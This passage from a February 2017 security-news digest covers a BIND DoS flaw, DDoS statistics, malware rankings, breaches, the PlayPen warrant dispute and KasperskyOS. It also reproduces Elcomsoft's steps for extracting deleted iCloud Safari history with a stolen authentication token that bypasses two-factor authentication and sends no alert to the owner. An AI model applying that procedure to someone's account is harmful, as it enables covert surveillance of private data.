Není to přitom poprvé, co Elcomsoft upozornil na možný prohřešek Applu. V minulosti zjistil, že iCloud ukládá rovněž uživatelskou historii hovorů bez toho, aby uživateli nabídl možnost tuto synchronizaci vypnout.
Na to Apple tehdy reagoval tím, že jde o funkci pro zajištění většího pohodlí, umožňující uživatelům zpětná volání z kteréhokoliv ze svých zařízení. Vedle toho, synchronizaci ukládání historie prohlížení, mohou uživatelé obávající se o své soukromí, alespoň vypnout.
Search engine companies will ban links published by major torrent hubs
13.2.2017 securityaffairs IT
Starting from June 1st search engine companies will block queries to links to pirated content, including films, TV shows, and copyright-protected content.
It will be even more difficult to search for torrents of ExtraTorrent, KickassTorrents, The Pirate Bay and equivalent services.
In the past copyright holders accused the search engine companies of doing too little to ban infringing links.
There have even been rumors that the new legislation could force search engine companies adopting drastic measures on tackling piracy.
Starting from June 1st, the major search engine will block any queries searching for specific pirated torrent files.
It will be not possible to find links to pirated content, including films, games, TV shows, music and copyright-protected content. The search engine companies have joined the efforts in the fight against online piracy.
The UK’s Intellectual Property Office is working with search engine companies and entertainment firms to reach an agreement to adopt a series of measured to tackle the piracy.
“Google and other search companies are close to striking a voluntary agreement with entertainment companies to tackle the appearance of infringing content links in search results.” reads a blog post published by TorrentFreak. “Following roundtable discussions chaired by the UK’s Intellectual Property Office, all parties have agreed that the code should take effect by June 1, 2017.”
The UK government has played a crucial role in reaching an agreement between the search engine giants and entertainment firms, it seems that the parties are “extremely close” to sign an agreement.
“The search engines involved in this work have been very co-operative, making changes to their algorithms and processes, but also working bilaterally with creative industry representatives to explore the options for new interventions, and how existing processes might be streamlined,” said the parliamentary Baroness Buscombe.
“I understand that all parties are keen to finalize and sign up to the voluntary agreement, and so we believe there is no need to take a legislative power at this time.”
“All parties have also agreed that the code should take effect, and the targets in it be reached, by 1 June this year,” Baroness added.
It will be very interesting to see how such kind of agreement reached in the UK could be effective overseas.
A new serious DOS flaw affects BIND DNS software, updates it now
12.2.2017 securityaffairs Attack
A new serious denial-of-service (DoS) vulnerability was patched this week by the Internet Systems Consortium (ISC) in the BIND DNS software.
A security serious denial-of-service (DoS) vulnerability, tracked as CVE-2017-3135, was patched this week by the Internet Systems Consortium (ISC) in the BIND DNS software.
The vulnerability in the BIND DNS software was reported by Ramesh Damodaran and Aliaksandr Shubnik of Infoblox.
The DoS flaw affects BIND 9.8.8, all 9.9 releases since 9.9.3, all 9.10 releases, and all 9.11 version.
The flaw has been patched with the release of versions 9.9.9-P6, 9.10.4-P6 and 9.11.0-P3.
The flaw, rated as “high severity” (CVSS score of 7.5), is remotely exploitable in the case of servers uses certain configurations.
“Some configurations using both DNS64 and RPZ can lead to an INSIST assertion failure or a NULL pointer read; in either case named will terminate.” reads the advisory published by the ISC
“Under some conditions when using both DNS64 and RPZ [Response Policy Zones] to rewrite query responses, query processing can resume in an inconsistent state leading to either an INSIST assertion failure or an attempt to read through a NULL pointer,”
Only servers utilizing both DNS64 and RPZ at the same time are potentially vulnerable.
“When this condition occurs, it will result in either an INSIST assertion failure (and subsequent abort) or an attempt to read through a NULL pointer. On most platforms a NULL pointer read leads to a segmentation fault (SEGFAULT), which causes the process to be terminated,” ISC added.
The advisory suggests to update each vulnerable installation, it also includes possible workarounds such as removing either DNS64 or RPZ from the configuration, or restricting the contents of the policy zone.
In January 2017, the Internet Systems Consortium (ISC) has issued updates to solve four high severity flaws in the DNS software BIND. The flaw could be exploited by a remote attacker to cause a DoS condition.
An attacker can exploit the vulnerabilities to cause the BIND name server process to encounter an assertion failure and stop executing.
Apple’s iCloud saved the deleted Safari browsing history over the years
12.2.2017 securityaffairs Apple
According to the Russian forensic firm Elcomsoft the Apple iCloud saved deleted Safari browsing history over the years open the door to surveillance.
According to digital forensics firm Elcomsof, Apple iCloud maintained deleted internet Safari browsing history over the years. The experts at Elcomsof discovered the issue while trying to extract records from iCloud accounts, they were able to retrieve supposedly deleted Safari browser histories from the accounts. The researchers were able to pull information such as the date and time the website was visited and when the record was deleted.
Safari history is synced across the devices used by a specific iCloud account. When the user deletes a record on one device, it will disappear on all other devices in a few seconds when the devices are connected to the Internet.
Users can set iCloud to store their browsing history, in this way it will be available from all the user’s connected devices. The researchers discovered that even if the user deletes the history, iCloud doesn’t actually erase it but keeps it in a format invisible to the user.
“However, those same records will be kept in Apple iCloud for much longer. In fact, we were able to access records dated more than one year back. The user does not see those records and does not know they still exist on Apple servers.” reads a blog post published by the Elcomsoft’s CEO Vladimir Katalov.
“In fact, we were able to access records dated more than one year back,”
The experts used the Elcomsoft Phone Breaker forensic tool to extract files from an iCloud account.
How does it work?
In order to extract Safari history from iCloud it is necessary to be authenticated into the user’s Apple ID. The operation can be carried on using login credentials or by using an authentication token extracted from the user’s computer. The authentication tokens are automatically created by iCloud Control Panel on Windows and Mac computers that were synced with iCloud.
The Elcomsoft Phone Breaker can be used by experts to extract iCloud authentication tokens.
“By using the token to log in, you’ll bypass both the password and the secondary authentication prompt if two-factor authentication is enabled on the user’s account. As a result, iCloud access alert will not be delivered to the user.” states the post.
Below the procedure to extract Safari browsing history from iCloud with Elcomsoft Phone Breaker:
Launch Elcomsoft Phone Breaker 6.40 or newer
Click “Download Synced Data from iCloud”
Authenticate with Apple ID/password or binary authentication token
Specify everything you’d like to download. Make sure to check “Safari”
Safari browsing history
The forensic implication of the discovery is serious because it implies the possibility to conduct surveillance activity as explained in the post.
“Forensic use of synced data is hard to underestimate. Unlike cloud backups that are created daily at best, iCloud sync works nearly in real-time. Being able to track suspect’s activities almost no delay can be invaluable for surveillance and investigations.” states Katalov.
“Since deleting browsing history from iCloud is nearly impossible for the user, discovering illicit activities becomes much easier. Experts will be able to recover visits to extremist and other illicit Web sites even if the suspect deletes their browser history or wipes their iPhone.”
Keeping a copy of a user’s browser history can certainly be “invaluable for surveillance and investigations,” Katalov said. But it’s unclear if Apple knew that its iCloud service was storing the deleted records.
Apple didn’t immediately respond to a request for comment, but experts from Elcomsoft noticed that after they disclosed the issue, Apple started “purging” older browser history records from iCloud.
“we have informed media about this issue in advance, and they reached Apple for comments. As far as we know, Apple has not responded, but started purging older history records. For what we know, they could be just moving them to other servers, making deleted records inaccessible from the outside; but we never know for sure. Either way, as of right now, for most iCloud accounts we can see history records for the last two weeks only (deleted records for those two weeks are still there though).” states the blog post. But now only deleted records as old as only two weeks can be extracted, the forensic company said.
Elcomsoft suggests disabling the syncing of Safari browsing history from iCloud.
A US minor is behind the cyber attack that hit Brussels airport after bombings
12.2.2017 securityaffairs Cyber
Prosecutors confirmed that the failed cyber attack on Brussels airport a few hours after 2016 bombings was launched by a US minor.
Prosecutors confirmed that the failed cyber attack on Brussels airport a few hours after dramatic 2016 bombings in Belgium’s capital was launched by a US minor.
On March 2016, suicide bombers attacked Zaventem airport and a metro station in the Belgium capital causing Thirty-two people died.
“Many more were injured in the attacks. The toll did not include three bombers who died. So-called Islamic State said it was behind the attacks.” reported the BBC.
The US youngster, a 14 years old based in Pittsburgh, has admitted having launched a cyber attack on the systems at the Brussels airport.
The young hacker launched a cyber attack against the airport’s computer system on the night of 22-23 March 2016, but the cyber incursion failed.
“In a statement on Thursday, Belgium’s federal prosecutors say the attempt to take down Zaventem’s website and hack into the airport’s computer system on the night of 22-23 March 2016 was unsuccessful.” continues the BBC.
The Belgium authorities conducted a joint investigation with the FBI that allowed them to identify the US minor, who “confessed having committed the acts”.
The cyber attack has “no terrorist motives” and according to prosecutors, it was not related to the Brussel bombings.
According to the prosecutors, the FBI identified and interrogated a minor of American nationality who “confessed having committed the acts”.
“From the investigation and the first analyses of the seized hardware it appeared that there were no terrorist motives,” the statement added.
The prosecutors say avoided to disclose further information on the case because the investigation is ongoing.
Let me close with an observation on the case:
The lack of perception for a cyber crime. The vast majority of youngsters hack out of boredom or to satisfy their egos, but completely ignores the consequences of a cyber attack. These attacks can have serious consequences, especially in conjunction with tragic events such as those that occurred in Brussels. It is necessary to instill awareness in young people and stimulate debate on cyber issues.
Youngsters could be easily manipulated by threat actors (i.e. terrorists, nation-state actors, cyber criminals) and we cannot underestimate the effectiveness of their activities in the cyber space. Young guys are precious resources for the modern society, but unaware boys could represent a dangerous threat.
DDoS attacks in Q4 2016
12.2.2017 Kaspersky Attack
Without doubt, 2016 was the year of Distributed Denial of Service (DDoS) with major disruptions in terms of technology, attack scale and impact on our daily life. In fact, the year ended with massive DDoS attacks unseen before, leveraging Mirai botnet technology, whose first appearance was covered in our last DDoS Intelligence Report.
Since then, we have published several other detailed reports dedicated to major attacks on Dyn’s Domain Name System (DNS) infrastructure, on Deutsche Telekom, which knocked 900K Germans offline in November. Additionally, we tracked similar attacks on Internet service providers (ISPs) in Ireland, the United Kingdom and Liberia all leveraging IoT devices controlled by Mirai technology and partly targeting home routers in an attempt to create new botnets.
Although ‘Rise of the Machines‘, as the Institute for Critical Infrastructure Technology (ICIT) titled its analysis, sounds quite blatant, it clearly shows that stakeholders worldwide, in particular in the United States and the European Union, recognize the lack of security inherent in the functional design of IoT devices and the need to set up a common IoT security ecosystem. And not before time, as we expect to see the emergence of further Mirai botnet modifications and a general increase in IoT botnet activity in 2017.
Altogether, the DDoS attacks we have seen so far are just a starting point initiated by various actors to draw up IoT devices into the actors’ own botnets, test drive Mirai technology and develop attack vectors. The DDoS attacks on five major Russian banks in November are a very good example of this.
First, they demonstrate once again that financial services like the bitcoin trading and blockchain platforms CoinSecure of India and BTC-e of Bulgaria, or William Hill, one of Britain’s biggest betting sites, which took days to come back to full service, were at the highest risk in the fourth quarter and are likely to remain so throughout 2017.
Second, cybercriminals have learnt to manage and launch very sophisticated, carefully planned, and constantly changing multi-vector DDoS attacks adapted to the mitigation policy and capacity of the attacked organization. As per our analysis, the cybercriminals in several other cases we tracked in 2016 started with a combination of various attack vectors gradually checking out a bank’s network and web services to find a point of service failure. Once DDoS mitigation and other countermeasures were initiated, the attack vectors changed over a period of several days.
Overall, these attacks show that the DDoS landscape entered the next stage of its evolution in 2016 with new technology, massive attack power, as well as highly skilled and professional cybercriminals. Unfortunately, this tendency has not yet found its way into the cybersecurity policies of many organizations that are still not ready or are unclear about the necessary investments in DDoS protection services.
Four main trends of the year
In 2016, the DDoS attack market saw a number of significant changes and developments. We have identified the four major trends:
The demise of amplification-type attacks. These attacks have been around for a while and the methods for combating them are well-known and have been perfected over time. They remained quite popular in the first half of 2016, but it was clear their number and volume were gradually declining. By the end of 2016, cybercriminals had almost completely given up using malicious amplification-type attacks, ending a downward trend that had lasted several years. First of all, this is the result of countermeasures being developed for these attacks. It’s also down to a reduction in the number of vulnerable amplification hosts available to the attackers (DNS Amplification attacks are the best illustration of this) as their owners react to the performance problems and losses associated with these attacks and look for ways to patch vulnerabilities.
Rising popularity of attacks on applications and the growth in their use of encryption. For the last few years UDP-based amplification attacks have remained the undisputed leader on the DDoS attack market, while attacks on applications have been relatively rare. In the second half of the year, and particularly in Q4, there was a dramatic increase in the popularity of attacks on applications, which gradually filled the niche previously occupied by amplification attacks. To organize such attacks, time-tested tools (Pandora, Drive, LOIC/HOIC) and new developments are used. Along with the growing popularity of attacks on applications, the number of these attacks using encryption is also growing. The use of encryption in most cases dramatically increases the efficiency of attacks and makes filtering them more difficult. In addition, cybercriminals continue to use an integrated approach, masking a small but effective attack on applications behind a simultaneous large-scale attack, for example, an attack involving a large number of short network packets (short-packet TCP flood).
The rise in popularity of WordPress Pingback attacks. WordPress Pingback-type attacks, which were extremely rare at the start of 2016, had by the fourth quarter occupied a substantial amount of the DDoS attack market. This is currently one of the most popular attack methods targeting applications, and we consider them separately from the overall mass of attacks at the application level. Relatively simple to organize, the “fingerprint” of these attacks is very specific, and the corresponding traffic can be easily separated from the general traffic flow. However, carrying out such an attack using encryption (something that was observed by Kaspersky Lab experts in Q4 2016) greatly complicates filtering and increases the malicious potential of this type of attack.
Use of IoT botnets to carry out DDoS attacks. After the publication of code on the GitHub resource on 24 October, Kaspersky Lab experts noticed a surge in interest in IoT devices among criminals, especially their use in botnets to perform DDoS attacks. The concepts and methods demonstrated by the creators of the Mirai botnet were used as the basis for a large number of new malicious codes and botnets consisting of IoT devices. These kinds of botnets were used in numerous attacks on Russian banks in Q4 2016. Unlike classic botnets, IoT-based botnets are huge in terms of both their volume and potential, something that was proved by the high-profile attack on the DNS DYN provider, which indirectly affected the work of many major web resources (e.g., Twitter, Airbnb, CNN and many others).
Statistics for botnet-assisted DDoS attacks
Methodology
Kaspersky Lab has extensive experience in combating cyber threats, including DDoS attacks of various types and levels of complexity. The company’s experts monitor botnet activity with the help of the DDoS Intelligence system.
DDoS Intelligence (part of Kaspersky DDoS Protection) is designed to intercept and analyze commands sent to bots from command and control (C&C) servers, and does not have to wait until user devices are infected or cybercriminal commands are executed in order to gather data.
This report contains the DDoS Intelligence statistics for the fourth quarter of 2016.
In the context of this report, a single (separate) DDoS attack is defined as an incident during which any break in botnet activity lasts less than 24 hours. If the same web resource was attacked by the same botnet after a break of more than 24 hours, this is regarded as a separate DDoS attack. Attacks on the same web resource from two different botnets are also regarded as separate attacks.
The geographic distribution of DDoS victims and C&C servers is determined according to their IP addresses. In this report, the number of DDoS targets is calculated based on the number of unique IP addresses reported in the quarterly statistics.
It is important to note that DDoS Intelligence statistics are limited to those botnets detected and analyzed by Kaspersky Lab. It should also be noted that botnets are just one of the tools used to carry out DDoS attacks; therefore, the data presented in this report does not cover every DDoS attack that has occurred within the specified time period.
Q4 Summary
Resources in 80 countries (vs. 67 in Q3) were targeted by DDoS attacks in Q4 2016.
71.6% of targeted resources were located in China.
South Korea, China and the US remained leaders in terms of both the number of targets and number of detected C&C servers.
The longest DDoS attack in Q4 2016 lasted for 292 hours (or 12.2 days) – significantly longer than the previous quarter’s maximum (184 hours, or 7.7 days) and set a record for 2016.
SYN DDoS, TCP DDoS and HTTP DDoS remain the most common DDoS attack scenarios. The proportion of attacks using the SYN DDoS method decreased by 5.7 p.p., while the shares of both TCP DDoS and HTTP DDoS grew considerably.
In Q4 2016, the percentage of attacks launched from Linux botnets decreased slightly and accounted for 76.7% of all detected attacks.
Geography of attacks
In Q4 2016, the geography of DDoS attacks expanded to 80 countries, with China accounting for 76.97% (4.4 p.p. more than the previous quarter). The US (7.3%) and South Korea (7%) were once again second and third respectively.
The Top 10 most targeted countries accounted for 96.9% of all attacks. Canada (0.8%) appeared in the rating, replacing Italy. Russia (1.75%) moved from fifth to fourth thanks to a 0.6 p.p. decline in Vietnam’s share.
Distribution of DDoS attacks by country, Q3 2016 vs. Q4 2016
Statistics for the fourth quarter show that the 10 most targeted countries accounted for 96.3% of all DDoS attacks.
Distribution of unique DDoS attack targets by country, Q3 2016 vs. Q4 2016
71.6% of attacks targeted resources located in China, which was 9 p.p. more than the previous quarter. There was a small increase in the number of targets in South Korea (+0.7 p.p.). The US rounded off the top three, even though its share decreased by 9.7 p.p. (9% vs.18.7% in Q3).
The shares of the other countries in the Top 10 remained almost unchanged, with the exception of Japan which saw a fall of 1 p.p. Italy and the Netherlands left the rating and were replaced by Germany (0.56%) and Canada (0.77%).
Changes in DDoS attack numbers
The distribution of DDoS activity was relatively even throughout Q4, with the exception of a sharp peak registered on 5 November when the largest number of attacks in 2016 – 1,915 – was recorded. The quietest day of Q4 was 23 November (90 attacks). However, by 25 November cybercriminal activity had increased to 981 attacks.
Number of DDoS attacks over time* in Q4 2016
*DDoS attacks may last for several days. In this timeline, the same attack may be counted several times, i.e. one time for each day of its duration.
Saturday was the busiest day of the week in Q4 for DDoS attacks (18.2% of attacks), followed by Friday 1.7 p.p. behind. Monday became the quietest day of the week for DDoS attacks (11.6%).
Distribution of DDoS attack numbers by day of the week, Q3 and Q4 2016
Types and duration of DDoS attacks
The SYN DDoS method remained the most popular: its share accounted for 75.3% of attacks, although this figure is 5.7 p.p. less than in the previous quarter. The figures for other attack types increased slightly – TCP DDoS (from 8.2% to 10.7%) and ICMP DDoS (from 1.7% to 2.2%). UDP’s contribution remained almost unchanged.
Distribution of DDoS attacks by type, Q3 and Q4 2016
Distribution of DDoS attacks by duration (hours) in Q4 2016 was distinctly uneven. While the share of attacks that lasted no more than four hours remained almost the same as the previous quarter (it decreased by just 1.56 p.p.), the figures for the other time periods changed significantly.
The share of attacks that lasted 5-9 hours increased from 14.49% to 19.28%. Attacks lasting 10-19 hours fell by 1.3 p.p., while the proportion of attacks that lasted 20-49 hours fell by even more – minus 3.35 p.p. The percentage of even longer attacks decreased considerably – the share of attacks lasting 50–99 hours accounted for 0.94%, compared to 3.46% in the previous quarter. The share of attacks that lasted 100-150 hours grew and reached 2.2%, which meant that Q4 saw twice as many of these attacks than those lasting 50-99 hours. There were very few cases of attacks lasting longer than 150 hours.
The longest DDoS attack in the fourth quarter lasted for 292 hours, 8 hours longer than the Q3 maximum. This was also the longest attack of 2016.
Distribution of DDoS attacks by duration (hours), Q3 and Q4 2016
C&C servers and botnet types
In Q4, the highest number of C&C servers (59.06%) was detected in South Korea. Although the country’s contribution increased by 13.3 p.p. from the previous quarter, it is much less than in Q2 2016 (69.6%). The top three countries hosting the most C&C servers remained unchanged – South Korea, China (8.72%) and the US (8.39%). Their total share accounted for 76.1%, which is an increase of 8.4 p.p. compared to Q3.
In the fourth quarter, three Western European countries – the Netherlands (7.4%), the UK (1.3%), and France (1.7%) – remained in the Top 10 after entering it back in Q3. Among the newcomers to the C&C rating were Bulgaria (6%) and Japan (1.3%).
Distribution of botnet C&C servers by country in Q4 2016
When it came to the distribution of operating systems in Q4, Linux-based DDoS bots remained the clear leader, although their share decreased by 2.2 p.p., accounting for 76.7%. This correlates with the decline in popularity of SYN DDoS for which Linux bots are the most appropriate tool.
The growing popularity of IoT devices used for DDoS attacks suggests that in 2017 the balance will shift further towards Linux, since most Internet-connected devices are based on this operating system.
Correlation between attacks launched from Windows and Linux botnets, Q3 and Q4 2016
The majority of attacks – 99.7% – were carried out by bots belonging to a single family. Cybercriminals launched attacks using bots from two different families in just 0.3% of cases.
Conclusions and forecasts
We expect the share of amplification-type attacks in 2017 to continue to decrease, especially the most popular types (DNS, NTP). However, considering the simplicity and low organizational costs, the technique may be used in some less popular protocols suitable for amplification (RIP, SSDP, LDAP and so on), though it is unlikely that such attacks will be very effective.
The number and complexity of attacks on applications will continue to grow. Considering the renewed interest in this type of attack among cybercriminals and the stagnation in this segment over the last few years, we can assume that older botnets will gradually fall out of use and something new will appear, for example, botnets capable of more sophisticated attacks. The trend for encryption in attacks on applications will remain.
WordPress Pingback attacks will remain popular. Although in the newer versions of the WordPress CMS the vulnerability used for organizing such attacks (namely, the default Pingback function in older CMS versions) has long since been patched by the developers, there are still many vulnerable hosts on the Internet. Of course, their number will decline over time, reducing the number and power of WordPress Pingback attacks. But the relative simplicity and low cost of organizing such attacks, as well as the possibility of using encryption, makes WordPress Pingback-type attacks attractive to unpretentious cybercriminals.
Botnets based on IoT devices will continue to grow. This is largely due to both the novelty of the IoT concept in general and exploitation of IoT devices by cybercriminals. We can assume that in the fourth quarter of 2016 we only saw the emergence of this new market segment, and in 2017 it will continue to grow and develop. The potential growth is difficult to estimate: until now IoT-device manufacturers were not particularly concerned about protecting their products. Even if we assume that all new IoT devices entering the market are perfectly protected from malicious attacks (which in itself is quite doubtful), the current volume of vulnerable IoT devices with Internet access is considerable. Just a few months after the initial appearance of the concept, attackers were able to demonstrate the use of botnets of unprecedented size and conduct attacks whose power was previously only considered possible in theory. Moreover, these devices have the potential to launch attacks of any complexity – the current trend is attacks on applications, including the use of encryption. Considering the highly effective nature and huge potential of IoT-based attacks, we can predict an increase in the number of such attacks as well as their volume and complexity in 2017.
Sports Direct hacked but it still hasn’t disclosed the breach to its staff
12.2.2017
Sports Direct, the UK’s largest sports retail business, was hacked last year, and still hasn’t disclosed the incident to its staff.
The Register confirmed that the Sports Direct, the UK’s largest sports retail business, was hacked last year, and still hasn’t disclosed the incident to its staff.
In the autumn a hacker broke into the internal systems of the company and accessed personal information of its staffers, including names, email and postal addresses, as well as phone numbers.
The attackers exploited known vulnerabilities affecting the unpatched version of the DNN platform used by the Sports Direct to host the staff portal.
According to an inside source with knowledge of the data breach, staffer data were stored in plain text. Sports Direct discovered the security breach in September, the insider claimed attacker left its number on the company’s internal website in order to be contacted by the business.
According to the El Reg, Sports Direct still has disclosed the data breach to the staff, the company filed an incident report with the Information Commissioner’s Office after it became aware of the intrusion.
“A spokesperson for the ICO confirmed to The Register that it was “aware of an incident from 2016 involving Sports Direct” and would be “be making enquiries.”” reported The Register.
“Sports Direct workers will be anxious to know what personal details have been hacked in this apparently serious data breach and why they weren’t immediately informed about it by their employer. This is potentially sensitive and personal information.” the Unite assistant general secretary Steve Turner told The Register.
“It’s completely unacceptable that the workers affected appear not to have been informed and the data breach swept under the carpet,”
“We will be immediately approaching the company for answers and further details about the potentially damaging impact of this on our members, as well as details about actions taken to ensure personal data is never compromised again,” the union’s assistant general secretary said. “In the meantime we would urge Sports Direct workers to check their financial records, change passwords and immediately report any suspicious activity.”
Which is the reply from Sports Direct?
“We cannot comment on operational matters in relation to cyber-security for obvious reasons. However, it is our policy to continually upgrade and improve our systems, and where appropriate we keep the relevant authorities informed.” said the a company spokesman.
Privacy groups claim FBI hacking operation in the PlayPen case was unconstitutional
11.2.2017 securityaffeirs BigBrothers
According to Privacy groups, the FBI search warrant used to hack into thousands of computers around the world in the PlayPen case was unconstitutional,
Privacy groups are claiming the FBI hacking campaign against the Playpen child pornography community violated international law.
According to the court documents, the FBI monitored the Playpen bulletin board Tor hidden service launched in August 2014, named Playpen, mainly used for “the advertisement and distribution of child pornography.”
The Playpen hidden service reached in one year over 200,000 users, with over 117,000 total posts mainly containing child pornography content. The law enforcement discovered nearly 1300 IP addresses belonging to the visitors.
According to Motherboard, the server running Playpen was seized by the FBI from a web host in North Carolina, then the law enforcement managed the computer to track its visitors. The agents used the network investigative technique (NIT) to obtain the IP addresses of the Playpen users.
The Feds hacked 8,700 computers in 120 countries, based on a single warrant, a procedure considered unconstitutional by privacy advocates. The US Law enforcement has expanded its extraterritorial surveillance capabilities without the consent of the states that were hosting the computers targeted by their malware.
“The FBI’s hacking operation in this case represents an enormous expansion of its extraterritorial surveillance capabilities — affecting thousands of computers in over a hundred countries around the world.” wrote Scarlet Kim, a legal officer with U.K.-based Privacy International. “How will other countries react to the FBI hacking in their jurisdictions without prior consent?”
What if a foreign intelligence agency of law enforcement body had carried out a similar hacking operation that compromised the computers of US citizens?
Last week, the U.K.-based Privacy International group, the Electronic Frontier Foundation (EFF) and the American Civil Liberties Union of Massachusetts, filed briefs in a lawsuit involving the FBI’s Playpen investigation.
The privacy groups filed briefs in a case involving Alex Levin, who is one of the suspects in the FBI’s Playpen investigation that was identified by the Feds thanks to the NIT (Network investigative technique).
The privacy advocates claim that the single warrant used by the FBI to conduct the hacking operations is not valid.
According to the EFF and ACLU groups, the warrant was invalid because the U.S. Constitution prohibits such kind of search on US citizens.
““No one questions the need for the FBI to investigate serious crimes like child pornography. But even serious crimes can’t justify throwing out our basic constitutional principles. Here, on the basis of a single warrant, the FBI searched 8,000 computers located all over the world,” EFF attorney Mark Rumold wrote in a blog post. “If the FBI tried to get a single warrant to search 8,000 houses, such a request would unquestionably be denied.”
The EFF consider unconstitutional the use of a single warrant to hack in so huge number of computers across the word.
On the other side, U.S. attorneys believe the Feds followed proper procedures in obtaining the warrant, there was no other way to unclock the criminals involved in the PlayPen case.
Kelihos becomes January’s Top 10 ‘Most Wanted’ Malware
11.2.2017 securityaffeirs Virus
The infamous Kelihos botnet climbed to the top position, while the Conficker worm dropped to fourth on the chart of malware.
Which are the most active malware in the wild?
According to a research conducted by CheckPoint Security, a malware landscape was characterized by some interesting changed in this first part of 2017.
The Kelihos botnet climbed to the top position, while the Conficker worm dropped to fourth on the chart of malware.
With great surprise, the eight-year-old malware Conficker continues to be one of the most active malware families in 2016.
In June 2016, researchers at CheckPoint described Conficker as “the most prominent family accounting for 14 percent of recognized attacks.” We remind the Conficker resurrection in 2015, when samples of the malware infected police body cameras.
Below the January’s Top 10 ‘Most Wanted’ Malware published by CheckPoint Security
Kelihos – Botnet mainly involved in bitcoin theft and spamming. It utilizes peer-to-peer communications, enabling each individual node to act as a Command & Control server
HackerDefender – User-mode Rootkit for Windows, can be used to hide files, processes and registry keys, and also implements a backdoor and port redirector that operates through TCP ports opened by existing services. This means it is not possible to find the hidden backdoor through traditional means.
Cryptowall – Ransomware that started as a Cryptolocker doppelgänger, but eventually surpassed it. After the takedown of Cryptolocker, Cryptowall became one of the most prominent ransomwares to date. Cryptowall is known for its use of AES encryption and for conducting its C&C communications over the Tor anonymous network. It is widely distributed via exploit kits, malvertising and phishing campaigns.
Conficker – Worm that allows remote operations and malware download. The infected machine is controlled by a botnet, which contacts its Command & Control server to receive instructions.
Nemucod – JavaScript or VBScript downloader which is commonly used to download ransomware variants or other malicious payloads.
RookieUA – Info Stealer designed to extract user account information such as logins and passwords and send them to a remote server.
Nivdort – Multipurpose bot, also known as Bayrob, that is used to collect passwords, modify system settings and download additional malware. It is usually spread via spam emails with the recipient address encoded in the binary, thus making each file unique.
Zeus – Banking Trojan that uses man-in-the-browser keystroke logging and form grabbing in order to steal banking information.
Ramnit – Banking Trojan that steals banking credentials, FTP passwords, session cookies and personal data.
Necurs – Botnet used to spread malware by spam emails, mainly Ransomware and Banking Trojans.
Recently the Kelihos malware was observed spreading via infected thumb drives. The third Most Wanted malware in January was CryptoWall, a well-known ransomware, the remaining positions in the Top 10 list are occupied by other botnets mainly involved in the distribution of the dreaded Locky ransomware.
Checkpoint observed also chenges in the mobile threat landscape, the Android Triada modular backdoor remains the most advanced mobile malware on the Top 3 Most Wanted mobile threats. At the second place, there is the HummingBad, CERT-EU and other sources corroborated Check Point researchers’ findings which recently confirmed a new variant of the ad-fraud-big-money-making, HummingBad, is spreading rapidly on the Android marketplace Google Play.
HummingBad was first seen and released almost a year ago in January/February 2016 by malware authors Yingmob, and racking upwards of approx. $300,000 USD per month for the better half of 2016. Approximately 10 million Android devices were infected in the firm part of the last year.
Now, dubbed by Check Point, “HummingWhale” is at large with better ad fraud capabilities and sophisticated techniques than HummingBad affecting several applications and has been downloaded several million times from the combined list of applications downloaded.
The third mobile malware threat is Hiddad, a strain of Android malware that repackages legitimate apps and then releases them to a third-party store.
Below the Top 3 ‘Most Wanted’ mobile malware:
Triada – Modular Backdoor for Android which grants super-user privileges to downloaded malware, as helps it to get embedded into system processes. Triada has also been seen spoofing URLs loaded in the browser.
Hummingbad – Android malware that establishes a persistent rootkit on the device, installs fraudulent applications, and with slight modifications could enable additional malicious activity such as installing a key-logger, stealing credentials and bypassing encrypted email containers used by enterprises.
Hiddad – Android malware which repackages legitimate apps and then released them to a third-party store. Its main function is displaying ads, however it is also able to gain access to key security details built into the OS, allowing an attacker to obtain sensitive user data.
Features of secure OS realization
11.2.2017 Kaspersky OS
There are generally accepted principles that developers of all secure operating systems strive to apply, but there can be completely different approaches to implementing these principles. A secure operating system can be developed from an existing OS by improving certain characteristics that are the cause (or the consequence) of that operating system’s insecure behavior, or it can be developed from scratch. The former approach has the clear advantage of lower development costs and compatibility with a broad range of software.
Let’s consider this approach in the context of systems that are part of the critical infrastructure. Two factors are important for such systems:
The ability to fulfil special security requirements, which may involve not only preserving certain general properties of information (such as confidentiality), but such things as tracking certain commands and data flows, having no impact on process execution in the system, etc.
The provision of guarantees that the system will work securely and will not be compromised.
Building a secure system based on a popular OS commonly involves implementing additional mechanisms of access control (e.g., based on the mandatory access control model), strengthened authentication, data encryption, security event auditing, and application execution control. As a rule, these are standard security measures, with the system’s special requirements addressed at the application level. As a result, special (and often also general) security measures rely on the implementation of numerous components, each of which can be compromised. Examples include: SELinux, RSBAC, AppArmor, TrustedBSD, МСВС, and Astra Linux, etc.
To improve security, tools that make it more difficult to exploit some vulnerabilities, including those inherent in the system due to its insecure original design, can be built into the system. Examples include: Grsecurity, AppArmor, Hardened Gentoo, Atlix, YANUX, and Astra Linux, etc.
Only a few years ago, a commonly used approach was to provide “security” guarantees based on scanning software code for errors and vulnerabilities and checking software integrity by comparing checksums. That approach was used in Openwall Linux, and some operating systems developed in Russia.
Although these measures lead to an overall improvement in the characteristics of general-purpose systems, they cannot address the special requirements for systems that are part of the critical infrastructure or guarantee security with a high degree of confidence.
Unlike initiatives based on attempts to improve the security of existing operating systems, KasperskyOS was, from the start, designed based on architectural principles that can ensure its secure behavior, that meets the requirements of special-purpose systems.
However, operating systems originally designed as secure cannot always guarantee that specific security policies will be enforced. Objective reasons for this include the difficulty of specifying clear security goals for such a relatively versatile IT product as an operating system, as well as the large number and variety of threats posed by the environment.
If an operating system is designed for specific uses on a more or less fixed range of hardware, with specific software running under it within defined operating scenarios, then security goals can be defined with sufficient accuracy and a threat model can be built. To achieve security goals, the model is used to develop a specific list of security requirements and trust requirements. Fulfilling these requirements is sufficient to guarantee the system’s secure behavior. Examples include specialized embedded solutions from LynuxWorks, Wind River, and Green Hills.
For a general-purpose operating system, achieving the same guarantees is more difficult due to a broader definition of security goals (which is necessary for the system to support a broader range of secure execution scenarios). As a rule, this requires support for a whole class of policies that are needed for a specific access control type (discretionary, mandatory, role-based), customary authentication mechanisms, and other protection tools whose management does not require specialist knowledge. This requires implementing relatively universal security mechanisms. Sometimes, provided that the OS runs on a fixed hardware platform (usually from the same vendor), compliance of these mechanisms with a certain standard or security profile can be guaranteed with a sufficient degree of confidence. Examples include: Oracle Solaris with Trusted Extensions, XTS-400, and OpenVMS, AS/400.
Finally, for a general-purpose operating system that runs on an arbitrary hardware platform, achieving high security guarantees is even harder because in this case the threat model grows out of all proportion.
